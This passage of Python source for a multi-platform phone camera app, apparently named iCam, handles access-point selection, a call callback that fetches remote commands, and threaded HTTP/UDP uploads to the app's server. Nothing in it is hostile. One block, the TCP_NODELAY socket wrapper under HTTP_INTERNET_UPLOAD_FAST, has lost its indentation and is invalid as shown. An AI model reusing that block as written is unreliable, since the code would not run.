                    #print "BTSocket: The IP address ", apo.ip
                    if _PyS60_1_9_OR_NEWER:
                        # Code working on PyS60 2.0.0, but not on 1.4.5
                        # see http://docs.python.org/library/socket.html
                        ip = socket.gethostbyname( socket.gethostname() )
                        print "IP address = ", ip
                        #print "IP address = ", socket.getaddrinfo(
                        #    socket.gethostname(), None)[0][4][0]
                        #sys.stdout.flush()
                    print "Connected to access point", accessPoint
                    break
            """
        except:
            # accessPointName = u""
            accessPointRetryConnect = True
            DebugPrintErrorTrace()
    elif SYMBIAN_UIQ_OS:
        accessPointName = u"[DEFAULT_AP]"
        """
        If accessPointRetryConnect is True it means that connection to the
        AP accessPointName was not successful. And this leads to retrying
        connection to the AP.
        """
        accessPointRetryConnect = False
    elif ANDROID_OS:
        accessPointName = u"[DEFAULT_AP]"
        """
        If accessPointRetryConnect is True it means that connection to the
        AP accessPointName was not successful. And this leads to retrying
        connection to the AP.
        """
        accessPointRetryConnect = False
    elif RASPBIAN_OS:
        accessPointName = u"[DEFAULT_AP]"
        """
        If accessPointRetryConnect is True it means that connection to the
        AP accessPointName was not successful. And this leads to retrying
        connection to the AP.
        """
        accessPointRetryConnect = False
    elif iOS_PYOBJC:
        accessPointName = u"[DEFAULT_AP]"
        """
        If accessPointRetryConnect is True it means that connection to the
        AP accessPointName was not successful. And this leads to retrying
        connection to the AP.
        """
        accessPointRetryConnect = False
    elif WINDOWS_CE_OS_PYTHONCE:
        accessPointName = u"[DEFAULT_AP]"
        """
        If accessPointRetryConnect is True it means that connection to the
        AP accessPointName was not successful. And this leads to retrying
        connection to the AP.
        """
        accessPointRetryConnect = False
    elif WINDOWS_OS:
        accessPointName = u"[Windows_PC_Internet_Connection]"
        """
        If accessPointRetryConnect is True it means that connection to the
        AP accessPointName was not successful. And this leads to retrying
        connection to the AP.
        """
        accessPointRetryConnect = False
    elif UNIX_OS:
        accessPointName = u"[Unix_PC_Internet_Connection]"
        """
        If accessPointRetryConnect is True it means that connection to the
        AP accessPointName was not successful. And this leads to retrying
        connection to the AP.
        """
        accessPointRetryConnect = False
def SelectAccessPoint():
    """
    Force an interactive access-point (re)selection.

    Clears accessPointName so that
    SelectAccessPointIfNoneAvailableAndConnectToIt() pops up the AP
    selection dialog; pressing Cancel there leaves the app in Offline
    mode.  On S60 the application title temporarily tells the user
    this, and is restored afterwards.
    """
    global accessPointName
    # We print on screen that pressing Cancel means no AP
    # if SYMBIAN_OS:
    if SYMBIAN_S60_OS:
        appuifw.app.title = u"Press Cancel to disable AP."
    accessPointName = u""
    SelectAccessPointIfNoneAvailableAndConnectToIt()
    if SYMBIAN_S60_OS:
        appuifw.app.title = ICAM_APP_TITLE
def TelephoneCallback(state):
    """
    Handle an incoming-call state change (PyS60 telephone callback).

    state is a (callState, phoneNumber) pair.  Logs and (optionally)
    uploads a description of the event, shows an info note, and on the
    ringing state triggers DownloadCommands() so a phone call can be
    used as a remote "poke" to fetch new commands.
    """
    global deviceId
    # NUMBER_WANTED = "786266000"
    myText = "TelephoneCallback(): Receiving a call from number %s (call " \
        "state is %s)." % (str(state[1]), str(state[0]))
    DebugPrint(myText)
    """
    if MY_DEBUG_STDOUT:
        l = len(state[1])
        if (state[1][l - len(NUMBER_WANTED) : l - 1] == NUMBER_WANTED):
            print "Phone number matched ;) ! Retrieving command."
    """
    if MY_DEBUG_UPLOAD_MSG:
        UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
            WEBPAGE_UL_GZIPPED_TEXT, None)
    """
    This is done in order for the application to continue running after the
    call. :o - inspired from
    http://discussion.forum.nokia.com/forum/showthread.php?t=120891
    """
    #appuifw.note(u"TelephoneCallback(): Received a call - call state is %s." \
    #    % str(state[0]), "info")
    appuifw.note(unicode(myText), "info")
    if state[0] == telephone.EStatusRinging:
        try:
            # global myTimer
            # myTimer.cancel()
            pass
        except:
            DebugPrintErrorTrace()
        """
        !!!!What if the call happens at the beginning of the program when the
        vars are not initialized --> error
        """
        # ReactiveLoop()
        DownloadCommands()
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
# Upper bound on parallel upload worker threads; the per-thread queue and
# lock lists below are sized to it.
NUM_MAX_THREADS_UPLOAD = 20
# Number of upload threads actually used by the multithreaded paths.
numThreadsUpload = 1
# These are crucial for Burst Photo mode
"""
To use InternetUploadBinaryDataMultiThreaded:
InternetUploadBinaryData = InternetUploadBinaryDataMultiThreaded
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = True
(should use a dedicated flag, for consistency)
with UDP also:
UPLOAD_USING_UDP = True
To use InternetUploadBinaryDataStandard in single threaded mode:
InternetUploadBinaryData = InternetUploadBinaryDataStandard
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
To use InternetUploadBinaryDataStandard in multithreaded mode:
InternetUploadBinaryData = InternetUploadBinaryDataStandard
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
There are other options also:
- simple multithreaded wo getresponse
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
# Does not call getresponse,uses TCP_NODELAY.
HTTP_INTERNET_UPLOAD_FAST = True
- fixed number of threads, with getresponse
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
# One of them has to be true not to DownloadCommands()
HTTP_INTERNET_UPLOAD_FAST = False
"""
# BEFORE_MAIN: We execute some code depending mostly on hardcoded settings!!
# Simple multithreaded wo getresponse
# if (deviceId == IMEI_6680) or (deviceId == IMEI_N82):
# NOTE(review): both branches below currently assign identical values, so
# the deviceId == IMEI_E7 special case is effectively a no-op.
if deviceId == IMEI_E7:
    """
    #!!!!To use normally
    UPLOAD_USING_UDP = False
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
    #MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = False
    # Does not call getresponse, uses TCP_NODELAY.
    HTTP_INTERNET_UPLOAD_FAST = True
    """
    UPLOAD_USING_UDP = False
    # MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = True
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False # True
    # MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False
    # MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = True
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = False
    # To not call getresponse, use TCP_NODELAY.
    HTTP_INTERNET_UPLOAD_FAST = False
else:
    # HTTP_INTERNET_UPLOAD_FAST = False
    UPLOAD_USING_UDP = False
    # MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = True
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False # True
    # MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False
    # MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = True
    MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = False
    # To not call getresponse, use TCP_NODELAY.
    HTTP_INTERNET_UPLOAD_FAST = False
# HTTP_INTERNET_UPLOAD_FAST = False
if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3:
    # Per-thread packet queues; built element by element because a
    # [[]] * N literal would share one list (see the original NOTE).
    # NOTE: this REPLICATES the same reference list from the first element for
    # all the other elements
    # dataToUploadAndPageOnServerForThread = [[]] * 10
    dataToUploadAndPageOnServerForThread = []
    for myI in range(NUM_MAX_THREADS_UPLOAD):
        dataToUploadAndPageOnServerForThread.append([])
    # One Ao_lock slot per worker; None until the worker thread creates it
    # (see InternetUploadThread).
    threadLock = []
    for myI in range(NUM_MAX_THREADS_UPLOAD):
        threadLock.append(None)
UDP_PORT = 1113
if UPLOAD_USING_UDP:
    # Inet, UDP
    socketUDP = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def InternetUploadThread(threadId):
    """Worker loop for MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 uploads.

    Creates its own Ao_lock in threadLock[threadId], opens a keep-alive
    HTTP connection to ICAM_SERVER_NAME, then forever drains its packet
    queue dataToUploadAndPageOnServerForThread[threadId] — each packet is
    sent via UDP when eligible, otherwise via HTTP POST — and blocks on
    the lock until InternetUploadBinaryDataMultiThreaded() signals new
    work.  Never returns.
    """
    global threadLock, dataToUploadAndPageOnServerForThread
    # Publish this worker's lock; until this line runs the producer sees
    # None in threadLock[threadId] (see InternetUploadBinaryDataMultiThreaded).
    threadLock[threadId] = e32.Ao_lock()
    # NOTE(review): the key "Connection:" carries a stray colon — the
    # header name was presumably meant to be "Connection"; confirm.
    httpRequestHeader = {"Connection:": "Keep-alive",
                         "Content-type": "application/x-gzip",
                         "Accept": "text/plain"}
    myHTTPConnection2 = None
    while myHTTPConnection2 is None:
        try:
            myHTTPConnection2 = httplib.HTTPConnection(ICAM_SERVER_NAME)
        except:
            DebugPrintErrorTrace()
            myHTTPConnection2 = None
    DebugPrint("InternetUploadThread(%d): time %s, thread ready to upload " \
               "packets." % \
               (threadId, GetCurrentDateTimeStringWithMilliseconds()))
    while True:
        # for i in range(len(dataToUploadAndPageOnServerForThread[threadId])):
        while len(dataToUploadAndPageOnServerForThread[threadId]) > 0:
            try:
                DebugPrint("InternetUploadThread(threadId = %d): before upload"\
                    " - time %s, len(dataToUploadAndPageOnServerForThread[threadId]) = %d." % \
                    (threadId,
                    GetCurrentDateTimeStringWithMilliseconds(),
                    len(dataToUploadAndPageOnServerForThread[threadId])))
                """
                Remove the item at the given position in the list and return it.
                (From http://docs.python.org/tutorial/datastructures.html)
                """
                dataToUploadAndPageOnServerPair = \
                    dataToUploadAndPageOnServerForThread[threadId].pop(0)
                #dataToUploadAndPageOnServerPair = \
                #    dataToUploadAndPageOnServerForThread[threadId][i]
                # Small state+media packets may go over UDP (single
                # datagram, < 1460 bytes); everything else goes over HTTP.
                if UPLOAD_USING_UDP and (dataToUploadAndPageOnServerPair[1] \
                        == WEBPAGE_UL_GZIPPED_STATE_AND_FILE) and \
                        (len(dataToUploadAndPageOnServerPair[0]) < 1460):
                    # Maybe see http://feetup.org/blog/dev/python/symbianPython.html
                    res = socketUDP.sendto(dataToUploadAndPageOnServerPair[0],
                                           (ICAM_SERVER_NAME, UDP_PORT))
                    DebugPrint("InternetUploadThread(threadId = %d): after " \
                               "upload - time %s, socketUDP.sendto() " \
                               "returned res = %d." % (threadId,
                               GetCurrentDateTimeStringWithMilliseconds(),
                               res))
                else:
                    myHTTPConnection2.request("POST",
                                              dataToUploadAndPageOnServerPair[1],
                                              dataToUploadAndPageOnServerPair[0],
                                              httpRequestHeader)
                    """
                    From http://docs.python.org/library/httplib.html:
                        "Note that you must have read the whole response
                        before you can send a new request to the server."
                    """
                    httpResponse = myHTTPConnection2.getresponse()
                    # """
                    """
                    On N82 with Linux server on the Intranet I need to give
                    httpResponse.read(), otherwise I get exception at the
                    next? call: ResponseNotReady, and then CannotSendRequest.
                    See also http://mail.python.org/pipermail/tutor/2003-May/022635.html:
                        "In order to re-use the connection, before you make the
                        next request, you need to read the data from the last
                        request. Not sure why that is, but thats the way it is.
                        So make sure you do your read.
                        Hope that helps someone else out there."
                    """
                    httpResponseString = httpResponse.read()
                    DebugPrint("InternetUploadThread(): " \
                               "httpResponseString = %s." % httpResponseString)
                    # """
                DebugPrint("InternetUploadThread(threadId = %d): after " \
                           "upload - time %s, " \
                           "len(dataToUploadAndPageOnServerForThread[threadId]) = %d." % \
                           (threadId,
                           GetCurrentDateTimeStringWithMilliseconds(),
                           len(dataToUploadAndPageOnServerForThread[threadId])))
            except:
                # Best effort: a failed packet is dropped, the loop continues.
                DebugPrintErrorTrace()
        # if len(dataToUploadAndPageOnServerForThread[threadId]) == 0:
        # Queue drained: sleep until the producer signals new packets.
        threadLock[threadId].wait()
    # Close the connection.
    # NOTE(review): unreachable — the while True loop above never exits.
    myHTTPConnection2.close()
# BEFORE_MAIN: We leave here these statements and not move them in Main(), in the idea that we will split the script in more modules!!
# if SYMBIAN_OS:
# Spawn the fixed pool of upload workers at import time (mode UPLOAD3 only).
if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3:
    for threadIndex in range(numThreadsUpload):
        #thread.start_new_thread(InternetUploadThread, (threadIndex, ))
        MyThreadStart(InternetUploadThread, (threadIndex, ))
def InternetUploadBinaryDataMultiThreaded(dataToUpload,
                                          inetServerAddress, pageOnServer):
    """Queue one packet for upload on the least-loaded worker thread.

    On non-Symbian platforms this simply delegates to
    InternetUploadBinaryDataStandard() (and returns None).  On Symbian
    the packet is appended to the shortest per-thread queue, the worker
    is started on first use, and its Ao_lock is signalled.  Returns 0.
    """
    global threadLock, dataToUploadAndPageOnServerForThread
    """
    !!!!
    IMPORTANT: Need to start explicitely
        http://mobile-revival.110mb.com/ReVival/UDP_stream_socket_server.php.
        It seems it stops sometimes by itself - there is a timeout on
        110mb.com, I guess.
    if UPLOAD_USING_UDP:
        myHTTPConnection = httplib.HTTPConnection(inetServerAddress)
        #ICAM_SERVER_NAME
        myHTTPConnection.request("GET",
            "http://mobile-revival.110mb.com/ReVival/UDP_stream_socket_server.php",
            "", httpRequestHeader)
    """
    if not SYMBIAN_OS:
        InternetUploadBinaryDataStandard(dataToUpload, inetServerAddress,
                                         pageOnServer)
        # NOTE(review): this path returns None, not 0 like the path below.
        return
    DebugPrint("Entered InternetUploadBinaryData() - multithreaded version: " \
               "time %s, (accessPointRetryConnect = %d), " \
               "pageOnServer = %s, len(dataToUpload) = %d." % \
               (GetCurrentDateTimeStringWithMilliseconds(),
               accessPointRetryConnect, pageOnServer,
               len(dataToUpload)))
    """
    if UPLOAD_USING_UDP and (pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE)\
        and (len(dataToUpload) < 1460):
        res = socketUDP.sendto(dataToUpload, (ICAM_SERVER_NAME, UDP_PORT))
        DebugPrint("InternetUploadBinaryData() - multithreaded version: " \
            "time %s, socketUDP.sendto() returned res = %d." % \
            (GetCurrentDateTimeStringWithMilliseconds(), res))
        return 0
    """
    try:
        """
        DebugPrint("InternetUploadBinaryData() - multithreaded version: " \
            "dataToUploadAndPageOnServerForThread = %s." % \
            (str(dataToUploadAndPageOnServerForThread)))
        """
        # Pick the worker with the shortest pending queue.
        minPackets = 1000000
        minPacketsIndex = -1
        for threadId in range(numThreadsUpload):
            if minPackets > len(dataToUploadAndPageOnServerForThread[threadId]):
                minPackets = len(dataToUploadAndPageOnServerForThread[threadId])
                minPacketsIndex = threadId
        DebugPrint("InternetUploadBinaryData() - multithreaded version: " \
                   "minPackets = %d, minPacketsIndex = %d." % \
                   (minPackets, minPacketsIndex))
        # Lazily start the worker the first time it is needed.
        # NOTE(review): threadLock[minPacketsIndex] is assigned by the
        # worker itself (see InternetUploadThread), so the .signal() below
        # can race a freshly started worker and raise on None; the except
        # swallows that, and the packet (already appended) is picked up
        # when the worker first scans its queue.
        if threadLock[minPacketsIndex] is None:
            #thread.start_new_thread(InternetUploadThread, (minPacketsIndex, ))
            MyThreadStart(InternetUploadThread, (minPacketsIndex, ))
        dataToUploadAndPageOnServerForThread[minPacketsIndex].append(
            (dataToUpload, pageOnServer))
        threadLock[minPacketsIndex].signal()
    except:
        DebugPrintErrorTrace()
    return 0
"""
Note: every function uploading through Internet uses
InternetUploadBinaryData().
"""
myHTTPConnection = None
if HTTP_INTERNET_UPLOAD_FAST:
# From http://www.cmlenz.net/archives/2008/03/python-httplib-performance-problems
realsocket = socket.socket
def socketwrap(family=socket.AF_INET, myType=socket.SOCK_STREAM, proto=0):
sockobj = realsocket(family, myType, proto)
sockobj.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
return sockobj
socket.socket = socketwrap
"""
We try connecting to the server until we succeed (hopefully this is
doable otherwise we are stuck here) :)
"""
while myHTTPConnection is None:
try:
myHTTPConnection = httplib.HTTPConnection(ICAM_SERVER_NAME)
except:
DebugPrintErrorTrace()
myHTTPConnection = None
numThreadIssued = 0
def SaveUnsentData(dataToUpload, pageOnServer):
    """Persist an upload packet that could not be sent to the server.

    The packet is written into LOCAL_FOLDER_UNSENT_FILES under a
    timestamped file name whose extension encodes the packet type, so it
    can be retried later (see UploadUnsentFILES()).

    dataToUpload -- the (already compressed) payload bytes.
    pageOnServer -- the server page the packet was destined for; it
        selects the file extension.  Packets for unknown pages — and text
        packets when saveUnsentPackets == 2 (media-only mode) — are
        silently dropped.
    """
    fileExtension = None
    if pageOnServer == WEBPAGE_UL_GZIPPED_TEXT:
        # saveUnsentPackets == 2 means "save media packets only", so text
        # messages are deliberately not persisted in that mode.
        if saveUnsentPackets != 2:
            fileExtension = EXTENSION_TEXT_MESSAGE
    elif (pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE) or \
            (pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE_PROXY_YOUTUBE):
        fileExtension = EXTENSION_STATE_AND_MEDIA_FILE
    elif pageOnServer == WEBPAGE_UL_GZIPPED_FILE:
        # Currently not implemented on the retry side.
        fileExtension = EXTENSION_ARBITRARY_FILE
    if fileExtension is None:
        return
    try:
        fileName = GetCurrentDateTimeStringWithMilliseconds() + \
            fileExtension
        fOutput = open(LOCAL_FOLDER_UNSENT_FILES + "/" + fileName, "wb")
        try:
            fOutput.write(dataToUpload)
        finally:
            # Always release the handle — the previous version leaked it
            # when write() raised (the except below swallowed the error).
            fOutput.close()
    except:
        # Best effort: failing to save an unsent packet must not crash.
        DebugPrintErrorTrace()
#def TreatExceptionInternetUploadBinaryData(funcName):
def TreatException(funcName):
    """Bookkeeping after a failed Internet upload.

    Logs the failure (with timestamp and free RAM), then applies a
    per-platform recovery policy keyed on internetUploadErrorsCounter:
    on Symbian, reaching internetUploadMaxErrors - 1 quits the
    application; any other Symbian error drops the default access point
    and sets accessPointRetryConnect so the next upload reconnects.
    Other platforms only log.  Always increments
    internetUploadErrorsCounter at the end.

    funcName -- name of the failing function, used in log messages.
    """
    global internetUploadErrorsCounter, accessPointRetryConnect, \
        MY_DEBUG_UPLOAD_MSG
    # Reset internetUploadErrorsCounter when successful:
    #internetUploadErrorsCounter = 0
    # !!!!Not really a good idea SelectAccessPoint() - if there is an
    # error from the operator, we do not want to have a dialog
    # appearing asking for selecting an Access Point.
    #SelectAccessPoint()
    #global accessPointName
    #accessPointName = u""
    myText = "%s returned exception. " \
        "Details: time = %s, free_ram = %d." % \
        (funcName, GetCurrentDateTimeStringNice(), GetFreeRAM())
    DebugPrint(myText)
    #exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()
    # repr(traceback.format_tb(exceptionTraceback))
    if MY_DEBUG_STDERR:
        sys.stderr.write(myText + " (see above).\n\n")
        #traceback.print_exc()
        sys.stderr.flush()
    if ANDROID_OS:
        if internetUploadErrorsCounter == internetUploadMaxErrors - 1:
            # !!!!TODO: finish for Android
            DebugPrint("%s: internetUploadErrorsCounter became %d " \
                "and accessPointRetryConnect = %d." % \
                (funcName, internetUploadErrorsCounter,
                accessPointRetryConnect))
    elif SYMBIAN_OS:
        #if internetUploadErrorsCounter == 20 - 1:
        if internetUploadErrorsCounter == internetUploadMaxErrors - 1:
            myText = "%s: internetUploadErrorsCounter became %d --> " \
                "quitting iCam." % (funcName, internetUploadErrorsCounter)
            DebugPrint(myText)
            if MY_DEBUG_STDERR:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            """
            Making MY_DEBUG_UPLOAD_MSG False to avoid giving more
            errors when trying to upload the message in Quit(),
            in which case Quit doesn't progress after the
            message upload, being stuck in a recursive
            execution with errors:
            See log of N95N95N95N95N95 on June 8th, 2011:
                Exiting iCam at 07:58:50 08-06-2011 - command given
                    from the cellphone.
                ...
                Exiting iCam at 09:06:06 08-06-2011 - command given
                    from the cellphone.
                ...
            and http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/FromPhone/stdout_2011_06_08_08_45_13.txt
            """
            MY_DEBUG_UPLOAD_MSG = False
            """
            TODO!!!!: In case restarting iCam doesn't help we should restart the phone.
                - TODO: for this to work don't reset internetUploadErrorsCounter
                    to 0 when iCam starts --> store internetUploadErrorsCounter in
                    iCam state.
            """
            Quit()
        else:
            # !!!!Maybe not a good idea.
            DebugPrint("%s: internetUploadErrorsCounter became %d --> " \
                "accessPointRetryConnect = %d and making it True; " \
                "also disconnecting from access point (to attempt " \
                "reconnect)." % \
                (funcName, internetUploadErrorsCounter,
                accessPointRetryConnect))
            if MY_DEBUG_STDERR:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            btsocket.set_default_access_point(None)
            """
            We got an exception while uploading data on the Inet,
            so we ASSUME we disconnected from the AP and try
            to connect next time.
            """
            accessPointRetryConnect = True
    elif iOS_PYOBJC:
        DebugPrint("%s: internetUploadErrorsCounter became %d and " \
            "accessPointRetryConnect = %d." % \
            (funcName, internetUploadErrorsCounter,
            accessPointRetryConnect))
    elif WINDOWS_OS:
        DebugPrint("%s: internetUploadErrorsCounter became %d and " \
            "accessPointRetryConnect = %d." % \
            (funcName, internetUploadErrorsCounter,
            accessPointRetryConnect))
    elif WINDOWS_CE_OS_PYTHONCE:
        DebugPrint("%s: internetUploadErrorsCounter became %d and " \
            "accessPointRetryConnect = %d." % \
            (funcName, internetUploadErrorsCounter,
            accessPointRetryConnect))
    """
    if ( (deviceId != IMEI_N82) and
            (internetUploadErrorsCounter == 100) ) or #10)
        ( (deviceId == IMEI_N82) and
            (internetUploadErrorsCounter == 300) ):
        if MY_DEBUG_STDOUT:
            print "Because internetUploadErrorsCounter == %d, we call"\
                " RestartPhone()." % internetUploadErrorsCounter
            sys.stdout.flush()
        RestartPhone()
    """
    internetUploadErrorsCounter += 1
    """
    # The user can choose an AP only if he wishes from the Application
    # menu or from the Remote Control Panel
    if accessPointName == u"":
        SelectAccessPointIfNoneAvailableAndConnectToIt()
    """
def InternetUploadBinaryDataStandard(dataToUpload, inetServerAddress,
                                     pageOnServer, itIsASeparateThread=False):
    """Upload one binary packet to inetServerAddress/pageOnServer via HTTP POST.

    On WinCE/Windows, media packets are first relayed to the YouTube
    proxy (recursing with itIsASeparateThread=True) and, depending on
    useiCamServer, the upload to the iCam server itself may be skipped.
    With MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 the work may instead be
    handed to a freshly spawned thread (bounded by numThreadsUpload).

    Returns 0 on success or thread handoff, -1 when the data could not
    be sent — in which case it is persisted via SaveUnsentData() when
    saveUnsentPackets > 0.
    """
    global myHTTPConnection
    global accessPointName, accessPointRetryConnect, bluetoothMode
    global numThreadIssued
    global useiCamServer
    global MY_DEBUG_UPLOAD_MSG
    # if WINDOWS_OS:
    """
    Currently we don't have libssl on WinCE (and not really for Windows - plus
    we test on Windows) so we use a proxy that communicates with YouTube.
    WINDOWS_OS is more for testing purposes.
    """
    if WINDOWS_CE_OS_PYTHONCE or WINDOWS_OS:
        # if itIsASeparateThread == True:
        if (pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE) and \
                (itIsASeparateThread == False):
            myText = "InternetUploadBinaryData(): upload the media file " \
                "to YouTube (through proxy) and " \
                "if useiCamServer == 2 to iCam."
            DebugPrint(myText)
            if MY_DEBUG_STDERR:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            # Recursive call targeting the GAE YouTube proxy;
            # itIsASeparateThread=True prevents infinite recursion here.
            InternetUploadBinaryDataStandard(dataToUpload,
                ICAM_GAE_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_STATE_AND_FILE_PROXY_YOUTUBE,
                itIsASeparateThread=True)
            #!!!!TODO: do better: avoid itIsASeparateThread to avoid recursion
            # InternetUploadBinaryDataStandard(dataToUpload, "localhost:8080",
            #    "/proxyyoutube", itIsASeparateThread=True)
            # return 0
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId,
                    "Finished uploading media data to " \
                    "YouTube proxy at time %s - packet of size " \
                    "%d bytes." % \
                    (GetCurrentDateTimeStringWithMilliseconds(),
                    len(dataToUpload)), ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
            """
            This means we only upload the state+video to YouTube and do not
            upload anything to iCam.
            """
            if useiCamServer == 0:
                return 0
            elif useiCamServer == 1:
                """
                !!!!Do send the state, or (don't we do this already?!!!!) at least inform iCam server that you
                uploaded to YouTube.
                We send ONLY THE STATE data from the Bluetooth message, to the
                iCam Server.
                #stateData = stateFileData[struct.calcsize(deviceIdFormat) :
                #    struct.calcsize(deviceIdFormat) +
                #    struct.calcsize(statePackFormat)]
                stateData = stateFileData[0 :
                    struct.calcsize(deviceIdFormat) +
                    struct.calcsize(statePackFormat)]
                stateDataCompressed = stateData.encode("zlib")
                UploadUnsentBinaryData(btClientDeviceId, fileName,
                    stateDataCompressed)
                """
                #pass
                #!!!!TODO We have to send the state to iCam server
                return 0
            elif useiCamServer == 2:
                pass #!!!!TODO - I think everything is OK - we just run again this function.
            """
            #inetServerAddress = "localhost:8080"
            inetServerAddress = ICAM_GAE_SERVER_NAME
            pageOnServer = "/proxyyoutube"
            """
        """
        if inetServerAddress != "localhost:8080":
            return 0
        """
    if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2:
        if itIsASeparateThread == False:
            """
            We create a separate thread to upload the data.
            We create only numThreadsUpload - 1 parallel threads to the main
            thread to upload.
            (Basically, we do this such that if numThreadsUpload == 1 we don't
            spawn any new thread.)
            """
            if numThreadIssued < numThreadsUpload - 1:
                DebugPrint("InternetUploadBinaryData(): " \
                    "itIsASeparateThread = %d, numThreadIssued = %d. "\
                    "Creating a new thread for upload." % \
                    (itIsASeparateThread, numThreadIssued))
                """
                thread.start_new_thread(InternetUploadBinaryData,
                    (dataToUpload, inetServerAddress, pageOnServer, True))
                """
                MyThreadStart(InternetUploadBinaryData,
                    (dataToUpload, inetServerAddress, pageOnServer, True))
                numThreadIssued += 1
                # e32.ao_sleep(2)
                """
                We do not report errors anymore... (being in burst mode we care
                for performance, so we do not retry sending unsent).
                However, we still must try to reconnect to AP if got
                disconnected!!!!
                """
                return 0
    DebugPrint("Entered InternetUploadBinaryData(): time %s, " \
        "accessPointRetryConnect = %d, inetServerAddress = %s, pageOnServer = %s, " \
        "len(dataToUpload) = %d, itIsASeparateThread = %d, " \
        "numThreadIssued = %d." % \
        (GetCurrentDateTimeStringWithMilliseconds(),
        accessPointRetryConnect,
        inetServerAddress,
        pageOnServer,
        len(dataToUpload),
        itIsASeparateThread,
        numThreadIssued))
    if accessPointRetryConnect:
        """
        We do this to avoid getting the dialog box with the Select AP.
        Unfortunately, it seems that at least on N95 when the phone's Inet AP
        doesn't work, trying to reconnect to it doesn't really work...
        """
        SelectAccessPointIfNoneAvailableAndConnectToIt()
    res = 0
    if NoInternetConnection(): # and bluetoothMode != 2):
        """
        When in offline mode (accessPointName == u"") I save data in Unsent.
        Otherwise, if not uploading, nor storing for later, one can just stop
        iCam (we assume for the moment iCam is not processing the video
        info and cannot trigger a notification via SMS/MMS or call).
        """
        DebugPrint("InternetUploadBinaryData(): not uploading data now; " \
            "deferring it for when we have Internet access.")
        res = -1
        """#!!!!TODO: think why
    elif useiCamServer == 0:
        DebugPrint("InternetUploadBinaryData(): not uploading data since " \
            "useiCamServer == 0.")
        res = -1
        """
    else:
        """
        Tell the HTTP command we are sending a gz file (normally) and we want
        text in the response.
        """
        # NOTE(review): the key "Connection:" carries a stray colon — the
        # header name was presumably meant to be "Connection"; confirm.
        httpRequestHeader = {"Connection:": "Keep-alive",
            "Content-type": "application/x-gzip",
            "Accept": "text/plain"}
        """
        From http://forums.devshed.com/python-programming-11/httplib-urllib-how-do-i-keep-a-connection-open-142565.html:
            "there is a Connection: Keep-alive option that you can pass in the
            header, if you use HTTP/1.1 protocol."
        """
        try:
            """
            if HTTP_INTERNET_UPLOAD_FAST == False:
                myHTTPConnection = httplib.HTTPConnection(inetServerAddress)
            """
            # A fresh connection per upload; the module-level one created
            # at import time is overwritten here.
            myHTTPConnection = httplib.HTTPConnection(inetServerAddress)
            if SYMBIAN_UIQ_OS:
                DebugPrint("InternetUploadBinaryData(): returned " \
                    "from httplib.HTTPConnection().")
            """
            !!!!len(dataToUpload) might be big (> 1MB), and it is not good to
                read all data in RAM at once. So do buffered reading and
                sending.!!!!
            From http://docs.python.org/library/httplib.html.
            HTTPConnection.request(method, url[, body[, headers]])
                This will send a request to the server using the HTTP request
                method method and the selector url.
                If the body argument is present, it should be a string of data to
                send after the headers are finished.
                !!!!Alternatively, it may be an open file object, in which case the
                contents of the file is sent; this file object should support
                fileno() and read() methods.
                The header Content-Length is automatically set to the correct value.
                The headers argument should be a mapping of extra HTTP headers to
                send with the request.
            """
            myHTTPConnection.request("POST", pageOnServer,
                dataToUpload, httpRequestHeader)
            if SYMBIAN_UIQ_OS:
                DebugPrint("InternetUploadBinaryData(): returned from " \
                    "myHTTPConnection.request().")
            if SYMBIAN_OS:
                """
                DebugPrint("InternetUploadBinaryData(): before calling " \
                    "e32.ao_yield().")
                """
                """
                This has the effect of flushing the eventual pending UI events.
                From [Mobile_Python_2007]: "The e32.ao_yield() at the end of
                    the loop makes sure that the system leaves some time to
                    register the keyboard events, as drawing in the tight loop
                    consumes lots of CPU power and might make the system
                    unresponsive."
